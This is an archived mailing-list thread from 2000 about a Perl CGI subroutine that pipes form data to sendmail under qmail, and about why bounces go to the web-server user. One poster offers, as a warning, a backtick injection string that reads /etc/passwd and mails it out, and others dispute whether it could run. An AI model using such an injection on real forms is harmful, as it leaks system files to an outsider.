Re: perl script acting funny
* Timothy Legant [EMAIL PROTECTED] [001112 19:28]: On Sun, Nov 12, 2000 at 12:55:08PM -0500, Peter Green wrote: program with either [EMAIL PROTECTED] (the literal user and machine name where the mail is originating) or the argument to the ``-f'' flag as specified above. Does the sendmail wrapper ignore Return-Path and instead use [EMAIL PROTECTED]? Certainly qmail-inject doesn't, but I haven't experimented with /var/qmail/bin/sendmail to check I was insinuating that it does, contrary to your statements. That had been my experience, but if I was mistaken (which I don't doubt for a second :) then I apologize for spreading vicious lies. ;) /pg -- Peter Green : Gospel Communications Network, SysAdmin : [EMAIL PROTECTED] --- Linux is obsolete (Andrew Tanenbaum)
RE: perl script acting funny
I could be a little bit off-base, but it might be a bad idea to
approach your problem this way. For instance, what if a person enters
somewhere in the form:
`cat /etc/passwd | mail -s "You dumb f***, you just got hacked"
[EMAIL PROTECTED]`
It is notoriously bad to /usr/lib/sendmail from a CGI script. Try
using the Net::SMTP module instead. It uses sockets, so you wouldn't
even have to worry about your local MTA.
/Wes
Wesley A. Wannemacher
[EMAIL PROTECTED]
Instructor, Network Administrator
University of Northwestern Ohio
http://www.unoh.edu
-Original Message-
From: Greg Kopp [mailto:[EMAIL PROTECTED]]
Sent: Sunday, November 12, 2000 12:56 AM
To: [EMAIL PROTECTED]
Subject: perl script acting funny
I have qmail and vpopmail installed on RH 6.2. I have a
perl subroutine that
we use to send e-mail. Here is the code snipit:
sub mailto
{ $mailprog = '/usr/lib/sendmail';
open(MAIL,"|$mailprog -t");
my @args = @_;
print MAIL "To: $args[0]\n";
print MAIL "Bcc: $args[4]\n";
print MAIL "From: $args[1]\n";
print MAIL "Subject: $args[2]\n";
print MAIL "$args[3]\n";
close MAIL;
}
BUT when a mail message gets bounced, the message comes
back to the user
that the web server is running as. Looking at the bounce, I
see this:
Hi. This is the qmail-send program at ideastar.com.
I'm afraid I wasn't able to deliver your message to the
following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.
[EMAIL PROTECTED]:
128.11.69.53 failed after I sent the message.
Remote host said: 554 delivery error: dd This user doesn't
have a yahoo.com
account ([EMAIL PROTECTED]) - mta129.mail.yahoo.com
--- Below this line is a copy of the message.
Return-Path: [EMAIL PROTECTED]
Received: (qmail 509 invoked by uid 1001); 9 Nov 2000 20:20:12 -
Date: 9 Nov 2000 20:20:12 -
Message-ID: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
From: [EMAIL PROTECTED]
Subject: Thank you
Any ideas what could be causing this and any possible solutions?
Thanks,
Greg
Re: perl script acting funny
* Wesley Wannemacher [EMAIL PROTECTED] [001113 15:09]: I could be a little bit off-base, but it might be a bad idea to approach your problem this way. For instance, what if a person enters somewhere in the form: `cat /etc/passwd | mail -s "You dumb f***, you just got hacked" [EMAIL PROTECTED]` Where exactly would that line be exec'd? There is only one place in the included code where stuff gets executed...there isn't any place to sneak your little command to the shell. It is notoriously bad to /usr/lib/sendmail from a CGI script. Try Nah, it isn't all that bad. Especially since he isn't passing any possibly-tainted data to the shell (in the open() line). /pg -- Peter Green : Gospel Communications Network, SysAdmin : [EMAIL PROTECTED] --- The wise man can pick up a grain of sand and envision a whole universe. But the stupid man will just lay down on some seaweed and roll around until he's completely draped in it. Then he'll stand up and go: Hey, I'm Vine Man. (Jack Handey)
Re: perl script acting funny
On Mon, Nov 13, 2000 at 03:04:27PM -0500, Wesley Wannemacher wrote: It is notoriously bad to /usr/lib/sendmail from a CGI script. Try using the Net::SMTP module instead. It uses sockets, so you wouldn't even have to worry about your local MTA. But you have to worry about connection failures, temporary errors, ... By using Net::SMTP from a cgi you'd have to rebuild a complete queuing strategy in case the mailserver doesn't accept the message. \Maex -- SpaceNet GmbH | http://www.Space.Net/ | Stress is when you wake Research Development| mailto:[EMAIL PROTECTED] | up screaming and you Joseph-Dollinger-Bogen 14 | Tel: +49 (89) 32356-0| realize you haven't D-80807 Muenchen | Fax: +49 (89) 32356-299 | fallen asleep yet.
RE: perl script acting funny
I have not tested this, but I was under the impression that the shell might present the problem on the last print statement: --print MAIL "$args[3]\n"; I'll have to check the O'Reilly book on CGI programming, but this is pretty bad if I remember correctly. I know that the formail code from Matt's Script Archive was exploited this way. The only way to be sure is to test it. As far as I can tell the flow of the program would be as follows HTML Form - PERL Code - shell. The backticks would preparsed by the shell. The output of the backtick statement would then be sent in the email. I am still somewhat of a perl newbie, so I could be wrong. Although at this point you may be interacting with the sendmail wrapper program. If this were the case, there is no risk. I will try it later tonight and let everyone know. /Wes Wesley A. Wannemacher [EMAIL PROTECTED] Instructor, Network Administrator University of Northwestern Ohio http://www.unoh.edu -Original Message- From: Peter Green [mailto:[EMAIL PROTECTED]] Sent: Monday, November 13, 2000 3:16 PM To: [EMAIL PROTECTED] Subject: Re: perl script acting funny * Wesley Wannemacher [EMAIL PROTECTED] [001113 15:09]: I could be a little bit off-base, but it might be a bad idea to approach your problem this way. For instance, what if a person enters somewhere in the form: `cat /etc/passwd | mail -s "You dumb f***, you just got hacked" [EMAIL PROTECTED]` Where exactly would that line be exec'd? There is only one place in the included code where stuff gets executed...there isn't any place to sneak your little command to the shell. It is notoriously bad to /usr/lib/sendmail from a CGI script. Try Nah, it isn't all that bad. Especially since he isn't passing any possibly-tainted data to the shell (in the open() line). /pg -- Peter Green : Gospel Communications Network, SysAdmin : [EMAIL PROTECTED] --- The wise man can pick up a grain of sand and envision a whole universe. But the stupid man will just lay down on some seaweed and roll around until he's completely draped in it. Then he'll stand up and go: Hey, I'm Vine Man. (Jack Handey)
Re: perl script acting funny
Russ Allbery wrote:
Greg Kopp [EMAIL PROTECTED] writes:
I have qmail and vpopmail installed on RH 6.2. I have a perl subroutine that
we use to send e-mail. Here is the code snipit:
sub mailto
{ $mailprog = '/usr/lib/sendmail';
open(MAIL,"|$mailprog -t");
my @args = @_;
print MAIL "To: $args[0]\n";
print MAIL "Bcc: $args[4]\n";
print MAIL "From: $args[1]\n";
print MAIL "Subject: $args[2]\n";
There should be two \n after the last line of the headers.
print MAIL "$args[3]\n";
close MAIL;
}
BUT when a mail message gets bounced, the message comes back to the user
that the web server is running as.
Bounces go back to the envelope sender. If you want to change the
envelope sender, pass the -f option to the sendmail emulation program, as
in:
/usr/lib/sendmail -t -f [EMAIL PROTECTED]
--
Russ Allbery ([EMAIL PROTECTED]) http://www.eyrie.org/~eagle/
You might as well add this header line:
print MAIL "Return-Path: ...\n";
Regards
Fabrice Scemama
Re: perl script acting funny
also sprach fabrice: /usr/lib/sendmail -t -f [EMAIL PROTECTED] You might as well add this header line: print MAIL "Return-Path: ...\n"; You can, though it won't do anything. It will be overwritten by the sendmail program with either [EMAIL PROTECTED] (the literal user and machine name where the mail is originating) or the argument to the ``-f'' flag as specified above. The man page for qmail-inject(8) (which is what the sendmail wrapper really calls) says that ``Return-Path is deleted in any case''. /pg -- Peter Green : Gospel Communications Network, SysAdmin : [EMAIL PROTECTED] --- Is there any hope for me? Am I just thick? Does anyone remember the Rubiks Cube, it was easier! I found that the Rubiks cube and Linux are alike. Looks real confusing until you read the right book. :-) (Seen on c.o.l.misc, about the "Linux Learning Curve")
Re: perl script acting funny
On Sun, Nov 12, 2000 at 12:55:08PM -0500, Peter Green wrote: also sprach fabrice: /usr/lib/sendmail -t -f [EMAIL PROTECTED] You might as well add this header line: print MAIL "Return-Path: ...\n"; You can, though it won't do anything. It will be overwritten by the sendmail I think what Fabrice is saying is that specifying the Return-Path header is an alternative to using the -f switch on the sendmail/qmail-inject command line. If you provide the Return-Path header to qmail-inject, it will use the address(es) specified there as the envelope sender, which is not quite the same as not doing anything. :) program with either [EMAIL PROTECTED] (the literal user and machine name where the mail is originating) or the argument to the ``-f'' flag as specified above. Does the sendmail wrapper ignore Return-Path and instead use [EMAIL PROTECTED]? Certainly qmail-inject doesn't, but I haven't experimented with /var/qmail/bin/sendmail to check The man page for qmail-inject(8) (which is what the sendmail wrapper really calls) says that ``Return-Path is deleted in any case''. This is true, but only *after* processing it and using it to set the envelope sender. man qmail-header and see the SENDER ADDRESSES section. Also, note that the -f option will override this behavior, as will having an 's' in the QMAILINJECT environment, etc., etc. /pg -thl
